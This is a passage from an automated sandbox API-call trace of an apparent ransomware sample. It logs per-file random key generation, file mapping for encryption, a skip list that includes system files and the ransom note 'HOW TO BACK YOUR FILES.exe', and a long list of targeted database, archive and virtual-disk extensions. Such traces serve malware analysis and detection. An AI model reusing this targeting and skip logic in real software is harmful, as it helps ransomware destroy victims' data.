users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.639] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2944352) returned 1 [0087.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.639] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.640] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.640] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.640] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2cf060, lpName=0x0) returned 0x15c [0087.642] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0xcf060) returned 0xdd0000 [0087.849] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.850] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.850] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.850] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0087.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0087.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.850] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0087.858] CloseHandle (hObject=0x15c) returned 1 [0087.858] CloseHandle (hObject=0x118) returned 1 [0087.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.868] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa381000, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xaa381000, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".") returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="..") returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="windows") returned -1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="temp") returned -1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="boot") returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="perflogs") returned -1 [0087.868] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0087.868] lstrlenW (lpString="OMSINTL.DLL.trx_dll") returned 19 [0087.868] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned 72 [0087.868] lstrcpyW (in: lpString1=0x2cce468, lpString2="OMSINTL.DLL.trx_dll" | out: lpString1="OMSINTL.DLL.trx_dll") returned="OMSINTL.DLL.trx_dll" [0087.868] lstrlenW (lpString="OMSINTL.DLL.trx_dll") returned 19 [0087.868] lstrlenW (lpString="Ares865") returned 7 [0087.869] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.869] lstrlenW (lpString=".dll") returned 4 [0087.869] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0087.869] lstrlenW (lpString=".lnk") returned 4 [0087.869] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0087.869] lstrlenW (lpString=".ini") returned 4 [0087.869] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0087.869] lstrlenW (lpString=".sys") returned 4 [0087.869] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0087.869] lstrlenW (lpString="OMSINTL.DLL.trx_dll") returned 19 [0087.869] lstrlenW (lpString="bak") returned 3 [0087.869] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.870] lstrlenW (lpString="ba_") returned 3 [0087.872] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.874] lstrlenW (lpString="dbb") returned 3 [0087.875] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.875] lstrlenW (lpString="vmdk") returned 4 [0087.875] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.875] lstrlenW (lpString="rar") returned 3 [0087.875] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.875] lstrlenW (lpString="zip") returned 3 [0087.875] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.875] lstrlenW (lpString="tgz") returned 3 [0087.875] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.875] lstrlenW (lpString="vbox") returned 4 [0087.877] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.877] lstrlenW (lpString="vdi") returned 3 [0087.877] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.877] lstrlenW (lpString="vhd") returned 3 [0087.877] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.877] lstrlenW (lpString="vhdx") returned 4 [0087.877] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.877] lstrlenW (lpString="avhd") returned 4 [0087.877] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.877] lstrlenW (lpString="db") returned 2 [0087.877] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.877] lstrlenW (lpString="db2") returned 3 [0087.877] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.877] lstrlenW (lpString="db3") returned 3 [0087.877] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.877] lstrlenW (lpString="dbf") returned 3 [0087.877] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.877] lstrlenW (lpString="mdf") returned 3 [0087.877] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.877] lstrlenW (lpString="mdb") returned 3 [0087.877] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.877] lstrlenW (lpString="sql") returned 3 [0087.877] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.877] lstrlenW (lpString="sqlite") returned 6 [0087.877] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.877] lstrlenW (lpString="sqlite3") returned 7 [0087.877] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.878] lstrlenW (lpString="sqlitedb") returned 8 [0087.878] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.878] lstrlenW (lpString="xml") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.878] lstrlenW (lpString="$er") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.878] lstrlenW (lpString="4dd") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.878] lstrlenW (lpString="4dl") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.878] lstrlenW (lpString="^^^") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.878] lstrlenW (lpString="abs") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.878] lstrlenW (lpString="abx") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.878] lstrlenW (lpString="accdb") returned 5 [0087.878] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.878] lstrlenW (lpString="accdc") returned 5 [0087.878] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.878] lstrlenW (lpString="accde") returned 5 [0087.878] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.878] lstrlenW (lpString="accdr") returned 5 [0087.878] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.878] lstrlenW (lpString="accdt") returned 5 [0087.878] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.878] lstrlenW (lpString="accdw") returned 5 [0087.878] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.878] lstrlenW (lpString="accft") returned 5 [0087.878] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.878] lstrlenW (lpString="adb") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.878] lstrlenW (lpString="adb") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.878] lstrlenW (lpString="ade") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.878] lstrlenW (lpString="adf") returned 3 [0087.878] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.879] lstrlenW (lpString="adn") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.879] lstrlenW (lpString="adp") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.879] lstrlenW (lpString="alf") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.879] lstrlenW (lpString="ask") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.879] lstrlenW (lpString="btr") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.879] lstrlenW (lpString="cat") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.879] lstrlenW (lpString="cdb") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.879] lstrlenW (lpString="ckp") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.879] lstrlenW (lpString="cma") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.879] lstrlenW (lpString="cpd") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.879] lstrlenW (lpString="dacpac") returned 6 [0087.879] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.879] lstrlenW (lpString="dad") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.879] lstrlenW (lpString="dadiagrams") returned 10 [0087.879] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0087.879] lstrlenW (lpString="daschema") returned 8 [0087.879] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.879] lstrlenW (lpString="db-journal") returned 10 [0087.879] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0087.879] lstrlenW (lpString="db-shm") returned 6 [0087.879] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.879] lstrlenW (lpString="db-wal") returned 6 [0087.879] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.879] lstrlenW (lpString="dbc") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.879] lstrlenW (lpString="dbs") returned 3 [0087.879] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.879] lstrlenW (lpString="dbt") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.880] lstrlenW (lpString="dbv") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.880] lstrlenW (lpString="dbx") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.880] lstrlenW (lpString="dcb") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.880] lstrlenW (lpString="dct") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.880] lstrlenW (lpString="dcx") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.880] lstrlenW (lpString="ddl") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.880] lstrlenW (lpString="dlis") returned 4 [0087.880] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.880] lstrlenW (lpString="dp1") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.880] lstrlenW (lpString="dqy") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.880] lstrlenW (lpString="dsk") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.880] lstrlenW (lpString="dsn") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.880] lstrlenW (lpString="dtsx") returned 4 [0087.880] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.880] lstrlenW (lpString="dxl") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.880] lstrlenW (lpString="eco") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.880] lstrlenW (lpString="ecx") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.880] lstrlenW (lpString="edb") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.880] lstrlenW (lpString="epim") returned 4 [0087.880] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.880] lstrlenW (lpString="fcd") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.880] lstrlenW (lpString="fdb") returned 3 [0087.880] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.881] lstrlenW (lpString="fic") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.881] lstrlenW (lpString="flexolibrary") returned 12 [0087.881] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0087.881] lstrlenW (lpString="fm5") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.881] lstrlenW (lpString="fmp") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.881] lstrlenW (lpString="fmp12") returned 5 [0087.881] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.881] lstrlenW (lpString="fmpsl") returned 5 [0087.881] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.881] lstrlenW (lpString="fol") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.881] lstrlenW (lpString="fp3") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.881] lstrlenW (lpString="fp4") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.881] lstrlenW (lpString="fp5") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.881] lstrlenW (lpString="fp7") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.881] lstrlenW (lpString="fpt") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.881] lstrlenW (lpString="frm") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.881] lstrlenW (lpString="gdb") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.881] lstrlenW (lpString="gdb") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.881] lstrlenW (lpString="grdb") returned 4 [0087.881] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.881] lstrlenW (lpString="gwi") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.881] lstrlenW (lpString="hdb") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.881] lstrlenW (lpString="his") returned 3 [0087.881] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.882] lstrlenW (lpString="ib") returned 2 [0087.882] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.882] lstrlenW (lpString="idb") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.882] lstrlenW (lpString="ihx") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.882] lstrlenW (lpString="itdb") returned 4 [0087.882] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.882] lstrlenW (lpString="itw") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.882] lstrlenW (lpString="jet") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.882] lstrlenW (lpString="jtx") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.882] lstrlenW (lpString="kdb") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.882] lstrlenW (lpString="kexi") returned 4 [0087.882] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.882] lstrlenW (lpString="kexic") returned 5 [0087.882] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.882] lstrlenW (lpString="kexis") returned 5 [0087.882] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.882] lstrlenW (lpString="lgc") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.882] lstrlenW (lpString="lwx") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.882] lstrlenW (lpString="maf") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.882] lstrlenW (lpString="maq") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.882] lstrlenW (lpString="mar") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.882] lstrlenW (lpString="marshal") returned 7 [0087.882] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.882] lstrlenW (lpString="mas") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.882] lstrlenW (lpString="mav") returned 3 [0087.882] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.882] lstrlenW (lpString="maw") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.883] lstrlenW (lpString="mdbhtml") returned 7 [0087.883] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.883] lstrlenW (lpString="mdn") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.883] lstrlenW (lpString="mdt") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.883] lstrlenW (lpString="mfd") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.883] lstrlenW (lpString="mpd") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.883] lstrlenW (lpString="mrg") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.883] lstrlenW (lpString="mud") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.883] lstrlenW (lpString="mwb") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.883] lstrlenW (lpString="myd") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.883] lstrlenW (lpString="ndf") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.883] lstrlenW (lpString="nnt") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.883] lstrlenW (lpString="nrmlib") returned 6 [0087.883] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.883] lstrlenW (lpString="ns2") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.883] lstrlenW (lpString="ns3") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.883] lstrlenW (lpString="ns4") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.883] lstrlenW (lpString="nsf") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.883] lstrlenW (lpString="nv") returned 2 [0087.883] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.883] lstrlenW (lpString="nv2") returned 3 [0087.883] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.883] lstrlenW (lpString="nwdb") returned 4 [0087.884] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.884] lstrlenW (lpString="nyf") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.884] lstrlenW (lpString="odb") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.884] lstrlenW (lpString="odb") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.884] lstrlenW (lpString="oqy") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.884] lstrlenW (lpString="ora") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.884] lstrlenW (lpString="orx") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.884] lstrlenW (lpString="owc") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.884] lstrlenW (lpString="p96") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.884] lstrlenW (lpString="p97") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.884] lstrlenW (lpString="pan") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.884] lstrlenW (lpString="pdb") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.884] lstrlenW (lpString="pdm") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.884] lstrlenW (lpString="pnz") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.884] lstrlenW (lpString="qry") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.884] lstrlenW (lpString="qvd") returned 3 [0087.884] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.884] lstrlenW (lpString="rbf") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.885] lstrlenW (lpString="rctd") returned 4 [0087.885] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.885] lstrlenW (lpString="rod") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.885] lstrlenW (lpString="rodx") returned 4 [0087.885] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.885] lstrlenW (lpString="rpd") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.885] lstrlenW (lpString="rsd") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.885] lstrlenW (lpString="sas7bdat") returned 8 [0087.885] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.885] lstrlenW (lpString="sbf") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.885] lstrlenW (lpString="scx") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.885] lstrlenW (lpString="sdb") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.885] lstrlenW (lpString="sdc") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.885] lstrlenW (lpString="sdf") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.885] lstrlenW (lpString="sis") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.885] lstrlenW (lpString="spq") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.885] lstrlenW (lpString="te") returned 2 [0087.885] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.885] lstrlenW (lpString="teacher") returned 7 [0087.885] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.885] lstrlenW (lpString="tmd") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.885] lstrlenW (lpString="tps") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.885] lstrlenW (lpString="trc") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.885] lstrlenW (lpString="trc") returned 3 [0087.885] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.886] lstrlenW (lpString="trm") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.886] lstrlenW (lpString="udb") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.886] lstrlenW (lpString="udl") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.886] lstrlenW (lpString="usr") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.886] lstrlenW (lpString="v12") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.886] lstrlenW (lpString="vis") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.886] lstrlenW (lpString="vpd") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.886] lstrlenW (lpString="vvv") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.886] 